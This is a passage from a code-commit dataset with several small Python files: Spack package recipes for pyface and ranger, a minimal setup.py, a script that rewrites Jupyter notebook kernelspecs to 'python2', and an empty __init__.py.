    editors, etc.), and let pyface and your selected toolkit and back-end take
    care of the details of displaying them."""

    homepage = "https://docs.enthought.com/pyface"
    url = "https://pypi.io/packages/source/p/pyface/pyface-6.1.2.tar.gz"

    version('6.1.2', sha256='7c2ac3d5cbec85e8504b3b0b63e9307be12c6d710b46bae372ce6562d41f4fbc')

    # Exactly one GUI toolkit backend is selected at concretization time.
    variant('backend', default='pyqt5', description='Default backend',
            values=('wx', 'pyqt', 'pyqt5', 'pyside'), multi=False)

    depends_on('py-setuptools', type='build')
    depends_on('py-traits', type=('build', 'run'))

    # Backends — each variant value pulls in its toolkit binding plus
    # pygments (except wx, which needs numpy instead).
    depends_on('py-wxpython@2.8.10:', when='backend=wx', type=('build', 'run'))
    depends_on('py-numpy', when='backend=wx', type=('build', 'run'))
    depends_on('py-pyqt4@4.10:', when='backend=pyqt', type=('build', 'run'))
    depends_on('py-pygments', when='backend=pyqt', type=('build', 'run'))
    depends_on('py-pyqt5@5:', when='backend=pyqt5', type=('build', 'run'))
    depends_on('py-pygments', when='backend=pyqt5', type=('build', 'run'))
    depends_on('py-pyside@1.2:', when='backend=pyside', type=('build', 'run'))
    depends_on('py-pygments', when='backend=pyside', type=('build', 'run'))
| Python | 0 | |
be0033ac91c28f3e45eff34c84b7da59d7fcefe2 | add py-ranger package (#3258) | var/spack/repos/builtin/packages/py-ranger/package.py | var/spack/repos/builtin/packages/py-ranger/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class PyRanger(PythonPackage):
    """A VIM-inspired filemanager for the console"""

    homepage = "http://ranger.nongnu.org/"
    url = "https://github.com/ranger/ranger/archive/v1.7.2.tar.gz"

    # Single known release; second argument is the old-style md5 checksum.
    version('1.7.2', '27805c3ab7ec4b129e1b93249506d925')

    depends_on('python@2.6:')
| Python | 0 | |
7e4a62aa483fbadc7089144191e48948f419903b | add setup.py | py/setup.py | py/setup.py | #!/usr/bin/env python
# vim: set fileencoding=utf8 shiftwidth=4 tabstop=4 textwidth=80 foldmethod=marker :
# Copyright (c) 2010, Kou Man Tong. All rights reserved.
# For licensing, see LICENSE file included in the package.
from distutils.core import setup
setup(name = "vtdb",
packages=["vtdb", "net"],
platforms = "Any",
)
| Python | 0 | |
a8f1529f6c077c0d70ccb326da6e63f3dd78ec76 | move kernel sanitization to separate script | sanitize_kernels.py | sanitize_kernels.py | import glob
import nbformat
# Sanitize kernelspec: force every notebook under notebooks/ to declare
# the 'python2' kernel, remembering each file's previous kernel name in
# old_envs so the change can be reverted (see the commented-out block
# below, kept for manual use).
notebooks = glob.glob("notebooks/*.ipynb")
old_envs = {}
for nb in notebooks:
    tmp = nbformat.read(nb,4)  # 4 = nbformat schema version to read as
    old_envs[nb] = tmp['metadata']['kernelspec']['name']
    tmp['metadata']['kernelspec']['name'] = 'python2'
    nbformat.write(tmp,nb)     # NOTE: overwrites the notebook in place

# Revert kernelspec (manual use: restores the kernel names saved above).
#for k in old_envs:
#    tmp = nbformat.read(k,4)
#    tmp['metadata']['kernelspec']['name'] = old_envs[k]
#    nbformat.write(tmp,k)
| Python | 0.000001 | |
9b4f18dbf63a76bd2c0723677fb0d0215831324a | Create __init__.py | ext/__init__.py | ext/__init__.py | Python | 0.000429 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.